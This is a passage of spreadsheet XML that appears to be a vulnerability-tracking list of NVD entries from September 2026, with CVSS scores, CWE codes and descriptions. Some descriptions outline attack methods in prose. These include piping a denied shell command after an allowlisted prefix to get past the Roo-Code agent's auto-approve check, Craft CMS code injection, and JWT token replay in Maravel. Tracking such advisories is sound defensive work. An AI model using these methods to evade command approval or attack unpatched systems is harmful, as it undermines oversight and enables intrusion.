t="inlineStr"><is><t>HIGH</t></is></c><c r="F252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G252" s="5" t="inlineStr" /><c r="H252" s="5" t="n"><v>0.005</v></c><c r="I252" s="5" t="inlineStr" /><c r="J252" s="5" t="inlineStr" /><c r="K252" s="5" t="inlineStr" /><c r="L252" s="5" t="inlineStr" /><c r="M252" s="5" t="inlineStr" /><c r="N252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P252" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q252" s="5" t="inlineStr" /><c r="R252" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S252" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81352</t></is></c></row><row r="253"><c r="A253" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C253" s="5" t="inlineStr"><is><t>CVE-2026-81385</t></is></c><c r="D253" s="5" t="n"><v>8.800000000000001</v></c><c r="E253" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G253" s="5" t="inlineStr" /><c r="H253" s="5" t="n"><v>0.01</v></c><c r="I253" s="5" t="inlineStr" /><c r="J253" s="5" t="inlineStr" /><c r="K253" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L253" s="5" t="inlineStr" /><c r="M253" s="5" t="inlineStr" /><c r="N253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P253" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q253" s="5" t="inlineStr" /><c r="R253" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S253" s="5" t="inlineStr"><is><t>Deserialization of untrusted data in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81385</t></is></c></row><row r="254"><c r="A254" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C254" s="5" t="inlineStr"><is><t>CVE-2026-81952</t></is></c><c r="D254" s="5" t="n"><v>8.800000000000001</v></c><c r="E254" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G254" s="5" t="inlineStr" /><c r="H254" s="5" t="n"><v>0.006</v></c><c r="I254" s="5" t="inlineStr" /><c r="J254" s="5" t="inlineStr" /><c r="K254" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L254" s="5" t="inlineStr" /><c r="M254" s="5" t="inlineStr" /><c r="N254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P254" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q254" s="5" t="inlineStr" /><c r="R254" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S254" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81952</t></is></c></row><row r="255"><c r="A255" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C255" s="5" t="inlineStr"><is><t>CVE-2026-81955</t></is></c><c r="D255" s="5" t="n"><v>8.800000000000001</v></c><c r="E255" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G255" s="5" t="inlineStr" /><c r="H255" s="5" t="n"><v>0.006</v></c><c r="I255" s="5" t="inlineStr" /><c r="J255" s="5" t="inlineStr" /><c r="K255" s="5" t="inlineStr" /><c r="L255" s="5" t="inlineStr" /><c r="M255" s="5" t="inlineStr" /><c r="N255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P255" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q255" s="5" t="inlineStr" /><c r="R255" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S255" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t></is></c></row><row r="256"><c r="A256" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C256" s="5" t="inlineStr"><is><t>CVE-2026-81996</t></is></c><c r="D256" s="5" t="n"><v>8.800000000000001</v></c><c r="E256" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F256" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G256" s="5" t="inlineStr" /><c r="H256" s="5" t="n"><v>0.001</v></c><c r="I256" s="5" t="inlineStr" /><c r="J256" s="5" t="inlineStr" /><c r="K256" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L256" s="5" t="inlineStr" /><c r="M256" s="5" t="inlineStr" /><c r="N256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P256" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q256" s="5" t="inlineStr" /><c r="R256" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S256" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t></is></c></row><row r="257"><c r="A257" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C257" s="5" t="inlineStr"><is><t>CVE-2026-82536</t></is></c><c r="D257" s="5" t="n"><v>8.800000000000001</v></c><c r="E257" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G257" s="5" t="inlineStr" /><c r="H257" s="5" t="n"><v>0.003</v></c><c r="I257" s="5" t="inlineStr" /><c r="J257" s="5" t="inlineStr" /><c r="K257" s="5" t="inlineStr" /><c r="L257" s="5" t="inlineStr" /><c r="M257" s="5" t="inlineStr" /><c r="N257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q257" s="5" t="inlineStr" /><c r="R257" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S257" s="5" t="inlineStr"><is><t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability in the shell command parsing logic that allows attackers to execute denied shell commands by exploiting the omission of the bash pipe operator from the command parser's operator token set. Attackers can craft a command line with an allowlisted prefix followed by the stderr-redirecting pipe operator and a denied command, causing the parser to approve the full pipeline while bash executes the denied component with the agent's auto-execute privileges on the developer's machine.</t></is></c><c r="T257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t></is></c></row><row r="258"><c r="A258" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C258" s="5" t="inlineStr"><is><t>CVE-2026-83941</t></is></c><c r="D258" s="5" t="n"><v>8.800000000000001</v></c><c r="E258" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G258" s="5" t="inlineStr" /><c r="H258" s="5" t="n"><v>0.007</v></c><c r="I258" s="5" t="inlineStr" /><c r="J258" s="5" t="inlineStr" /><c r="K258" s="5" t="inlineStr"><is><t>microsoft:entra_id</t></is></c><c r="L258" s="5" t="inlineStr" /><c r="M258" s="5" t="inlineStr" /><c r="N258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P258" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q258" s="5" t="inlineStr" /><c r="R258" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S258" s="5" t="inlineStr"><is><t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t></is></c></row><row r="259"><c r="A259" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C259" s="5" t="inlineStr"><is><t>CVE-2026-83992</t></is></c><c r="D259" s="5" t="n"><v>8.800000000000001</v></c><c r="E259" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G259" s="5" t="inlineStr" /><c r="H259" s="5" t="n"><v>0.006</v></c><c r="I259" s="5" t="inlineStr" /><c r="J259" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K25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59" s="5" t="inlineStr" /><c r="M259" s="5" t="inlineStr" /><c r="N259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P259" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q259" s="5" t="inlineStr" /><c r="R259" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S259" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t></is></c></row><row r="260"><c r="A260" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C260" s="5" t="inlineStr"><is><t>CVE-2026-83996</t></is></c><c r="D260" s="5" t="n"><v>8.800000000000001</v></c><c r="E260" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G260" s="5" t="inlineStr" /><c r="H260" s="5" t="n"><v>0.002</v></c><c r="I260" s="5" t="inlineStr" /><c r="J260" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K26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60" s="5" t="inlineStr" /><c r="M260" s="5" t="inlineStr" /><c r="N260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P260" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q260" s="5" t="inlineStr" /><c r="R260" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S260" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t></is></c></row><row r="261"><c r="A261" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C261" s="5" t="inlineStr"><is><t>CVE-2026-83998</t></is></c><c r="D261" s="5" t="n"><v>8.800000000000001</v></c><c r="E261" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G261" s="5" t="inlineStr" /><c r="H261" s="5" t="n"><v>0.004</v></c><c r="I261" s="5" t="inlineStr" /><c r="J261" s="5" t="inlineStr" /><c r="K261" s="5" t="inlineStr" /><c r="L261" s="5" t="inlineStr" /><c r="M261" s="5" t="inlineStr" /><c r="N261" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O261" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P261" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q261" s="5" t="inlineStr" /><c r="R261" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S261" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T261" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t></is></c></row><row r="262"><c r="A262" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B262" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C262" s="5" t="inlineStr"><is><t>CVE-2026-85877</t></is></c><c r="D262" s="5" t="n"><v>8.800000000000001</v></c><c r="E262" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F262" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G262" s="5" t="inlineStr" /><c r="H262" s="5" t="n"><v>0.004</v></c><c r="I262" s="5" t="inlineStr" /><c r="J262" s="5" t="inlineStr" /><c r="K262" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2</t></is></c><c r="L262" s="5" t="inlineStr" /><c r="M262" s="5" t="inlineStr" /><c r="N262" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O262" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P262" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q262" s="5" t="inlineStr" /><c r="R262" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S262" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T262" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t></is></c></row><row r="263"><c r="A263" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B263" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C263" s="5" t="inlineStr"><is><t>CVE-2026-86076</t></is></c><c r="D263" s="5" t="n"><v>8.800000000000001</v></c><c r="E263" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G263" s="5" t="inlineStr" /><c r="H263" s="5" t="n"><v>0.004</v></c><c r="I263" s="5" t="inlineStr" /><c r="J263" s="5" t="inlineStr" /><c r="K263" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L263" s="5" t="inlineStr" /><c r="M263" s="5" t="inlineStr" /><c r="N263" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O263" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P263" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q263" s="5" t="inlineStr" /><c r="R263" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S263" s="5" t="inlineStr"><is><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is></c><c r="T263" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t></is></c></row><row r="264"><c r="A264" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B264" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C264" s="5" t="inlineStr"><is><t>CVE-2026-86083</t></is></c><c r="D264" s="5" t="n"><v>8.800000000000001</v></c><c r="E264" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G264" s="5" t="inlineStr" /><c r="H264" s="5" t="n"><v>0.004</v></c><c r="I264" s="5" t="inlineStr" /><c r="J264" s="5" t="inlineStr" /><c r="K264" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L264" s="5" t="inlineStr" /><c r="M264" s="5" t="inlineStr" /><c r="N264" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O264" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P264" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q264" s="5" t="inlineStr" /><c r="R264" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S264" s="5" t="inlineStr"><is><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is></c><c r="T264" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t></is></c></row><row r="265"><c r="A265" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B265" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C265" s="5" t="inlineStr"><is><t>CVE-2026-86730</t></is></c><c r="D265" s="5" t="n"><v>8.800000000000001</v></c><c r="E265" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G265" s="5" t="inlineStr" /><c r="H265" s="5" t="n"><v>0.004</v></c><c r="I265" s="5" t="inlineStr" /><c r="J265" s="5" t="inlineStr" /><c r="K265" s="5" t="inlineStr" /><c r="L265" s="5" t="inlineStr" /><c r="M265" s="5" t="inlineStr" /><c r="N265" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P265" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q265" s="5" t="inlineStr" /><c r="R265" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S265" s="5" t="inlineStr"><is><t>Craft CMS versions before 5.10.12 fail to properly cleanse string-typed field-layout elements, allowing authenticated control-panel users to inject Yii2 behavior attachments and event handlers. Attackers can post field-layout tab elements as JSON strings to bypass cleanse validation, then trigger arbitrary object instantiation and code execution through Craft::createObject().</t></is></c><c r="T265" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t></is></c></row><row r="266"><c r="A266" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B266" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C266" s="5" t="inlineStr"><is><t>CVE-2026-12611</t></is></c><c r="D266" s="5" t="n"><v>8.699999999999999</v></c><c r="E266" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F266" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G266" s="5" t="inlineStr" /><c r="H266" s="5" t="n"><v>0.003</v></c><c r="I266" s="5" t="inlineStr" /><c r="J266" s="5" t="inlineStr" /><c r="K266" s="5" t="inlineStr" /><c r="L266" s="5" t="inlineStr" /><c r="M266" s="5" t="inlineStr" /><c r="N266" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O266" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P266" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q266" s="5" t="inlineStr" /><c r="R266" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S266" s="5" t="inlineStr"><is><t>A client may issue HTTP/2 requests to a Jetty server that result in blocking writes that are never unblocked, eventually causing all threads to be blocked and the whole server to become unresponsive.




This is caused by a race condition in the server when handling RST_STREAM frames and GOAWAY frames sent by the client.




The race condition "resets" the HTTP2Flusher.terminated, previously set to a non-null value, to the null value, allowing entries to be enqueued in the flusher that however will never be processed. These unprocessed entries are the ones that would unblock the write-blocked threads.</t></is></c><c r="T266" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t></is></c></row><row r="267"><c r="A267" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B267" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C267" s="5" t="inlineStr"><is><t>CVE-2026-33197</t></is></c><c r="D267" s="5" t="n"><v>8.699999999999999</v></c><c r="E267" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F267" s="5" t="inlineStr"><is><t>biossecurity@ami.com</t></is></c><c r="G267" s="5" t="inlineStr" /><c r="H267" s="5" t="n"><v>0.001</v></c><c r="I267" s="5" t="inlineStr" /><c r="J267" s="5" t="inlineStr" /><c r="K267" s="5" t="inlineStr" /><c r="L267" s="5" t="inlineStr" /><c r="M267" s="5" t="inlineStr" /><c r="N267" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P267" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q267" s="5" t="inlineStr" /><c r="R267" s="5" t="inlineStr"><is><t>CWE-184</t></is></c><c r="S267" s="5" t="inlineStr"><is><t>AMI APTIOV contains a vulnerability in BIOS where a privileged user may cause the “Incomplete List of Disallowed Inputs” by local access. Successful exploitation of this vulnerability may lead to arbitrary code execution and impact system Confidentiality, Integrity, and Availability.</t></is></c><c r="T267" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t></is></c></row><row r="268"><c r="A268" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B268" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C268" s="5" t="inlineStr"><is><t>CVE-2026-55250</t></is></c><c r="D268" s="5" t="n"><v>8.699999999999999</v></c><c r="E268" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F268" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G268" s="5" t="inlineStr" /><c r="H268" s="5" t="n"><v>0.006</v></c><c r="I268" s="5" t="inlineStr" /><c r="J268" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K268" s="5" t="inlineStr" /><c r="L268" s="5" t="inlineStr" /><c r="M268" s="5" t="inlineStr" /><c r="N268" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O268" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P268" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q268" s="5" t="inlineStr" /><c r="R268" s="5" t="inlineStr"><is><t>CWE-294, CWE-613, CWE-672</t></is></c><c r="S268" s="5" t="inlineStr"><is><t>Maravel, a PHP framework oriented towards dependency injection, prior to version 10.74.0 has a high-severity Token Replay Vulnerability arising from a structural lifecycle mismatch between stateless token validation engines and high-performance relational caching layers. Any application with low cache memory that causes premature eviction to free up memory and applications running macropay-solutions/maravel-framework that utilize tymon/jwt-auth for API token authentication and blacklist management or any other package that does the same may be affected. This architectural risk might also impact native Laravel applications utilizing cache tags under specific volatile or eviction-capped environments. tymon/jwt-auth automatically probes for cache tag support. If found, it forcefully wraps 14-day token blacklist entries (jti) inside a relational tymon.jwt tag. In environments where the O(1) Atomic Lazy Eviction model is active — either natively inside Maravel-Framework v20.x or manually backported into v10.x via the explicit DI container singletons provided in PR #104 (App\Cache\TaggedCache and App\Cache\TagSet) — a strict global tracking ceiling (Container::TAGGED_CACHE_TTL_CAP_SECONDS) of 7,200 seconds (2 hours) is enforced to secure the system against memory index bloat. This ceiling forcefully truncates the 14-day blacklist lifespan down to a maximum of 2 hours, after which individual tracking keys naturally expire and disappear from the active cache window. Furthermore, because the optimized engine implements a generational version matrix to achieve O(1) flush speeds, any programmatic or manual invocation of a tag flush or reset (e.g., Cache::tags([...])-&gt;flush()) instantly bumps the internal atomic master version pointer. This shifts the computed cryptographic composite hash (sha1($this-&gt;tags-&gt;getNamespace())) for all overlapping components, rendering the entire existing index immediately unreachable. Consequently, through either natural 2-hour expiration or an intervening tag flush execution (like the cache naturally cleaning old values to free up memory), the invalidation state records are entirely wiped out. Because the tokens' physical cryptographic signatures remain structurally valid for up to 14 days, stolen, hijacked, or legitimately logged-out tokens are instantly and silently resurrected across the entire API gateway, leaving the application critically vulnerable to widespread Token Replay Attacks. Because this issue is caused by an upstream architectural assumption within the tymon/jwt-auth package rather than a core defect inside the framework, there is no direct framework version upgrade that can safely bypass this lifecycle collision without breaking business cache recycling bounds. Maravel version 10.74.0 introduced a way to backport the new fixed tagged cache from 20.x into 10.x by resolving TagSet and TaggedCache from DI, which is how this latent architectural lifecycle vulnerability was discovered. Users must apply the decoupled configuration workaround outlined below. As a workaround, make sure that cache memory size does not generate early natural evictions from cache to free up space, deleting blacklisted jwt ids before they expire. Applications must decouple flat authentication vectors from the relational tagging subsystem. This forces token identifiers to write directly to the primary cache keyspace as flat, un-tagged key-value pairs where they securely retain their unclipped 14-day lifecycle.</t></is></c><c r="T268" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t></is></c></row><row r="269"><c r="A269" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B269" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C269" s="5" t="inlineStr"><is><t>CVE-2026-62648</t></is></c><c r="D269" s="5" t="n"><v>8.699999999999999</v></c><c r="E269" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F269" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G269" s="5" t="inlineStr" /><c r="H269" s="5" t="n"><v>0.003</v></c><c r="I269" s="5" t="inlineStr" /><c r="J269" s="5" t="inlineStr" /><c r="K269" s="5" t="inlineStr" /><c r="L269" s="5" t="inlineStr" /><c r="M269" s="5" t="inlineStr" /><c r="N269" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P269" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q269" s="5" t="inlineStr" /><c r="R269" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S269" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The length of the URL component contained in pre-authenticated HTTP messages is not properly validated before appending additional data to it, resulting in an out-of-bounds write condition in memory. This could allow an unauthenticated remote attacker to crash the affected device, causing a reboot and resulting in a denial-of-service condition.</t></is></c><c r="T269" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t></is></c></row><row r="270"><c r="A270" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B270" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C270" s="5" t="inlineStr"><is><t>CVE-2026-62649</t></is></c><c r="D270" s="5" t="n"><v>8.699999999999999</v></c><c r="E270" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F270" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G270" s="5" t="inlineStr" /><c r="H270" s="5" t="n"><v>0.003</v></c><c r="I270" s="5" t="inlineStr" /><c r="J270" s="5" t="inlineStr" /><c r="K270" s="5" t="inlineStr" /><c r="L270" s="5" t="inlineStr" /><c r="M270" s="5" t="inlineStr" /><c r="N270" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O270" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P270" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q270" s="5" t="inlineStr" /><c r="R270" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S270" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The web server does not properly limit or manage system resources when processing a high volume of concurrent HTTP requests. This could allow an unauthenticated remote attacker to cause the entire device to crash and reboot, resulting in a denial-of-service condition.</t></is></c><c r="T270" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t></is></c></row><row r="271"><c r="A271" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B271" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C271" s="5" t="inlineStr"><is><t>CVE-2026-62650</t></is></c><c r="D271" s="5" t="n"><v>8.699999999999999</v></c><c r="E271" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F271" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G271" s="5" t="inlineStr" /><c r="H271" s="5" t="n"><v>0.003</v></c><c r="I271" s="5" t="inlineStr" /><c r="J271" s="5" t="inlineStr" /><c r="K271" s="5" t="inlineStr" /><c r="L271" s="5" t="inlineStr" /><c r="M271" s="5" t="inlineStr" /><c r="N271" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P271" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q271" s="5" t="inlineStr" /><c r="R271" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S271" s="5" t="inlineStr"><is><t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). Server-side authorization checks in the web-based management interface are not properly enforced, allowing role-based access control (RBAC) restrictions to be bypassed through manipulation of request data. This could allow an authenticated, low-privileged remote attacker to escalate privileges to an administrative level.</t></is></c><c r="T271" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t></is></c></row><row r="272"><c r="A272" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B272" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C272" s="5" 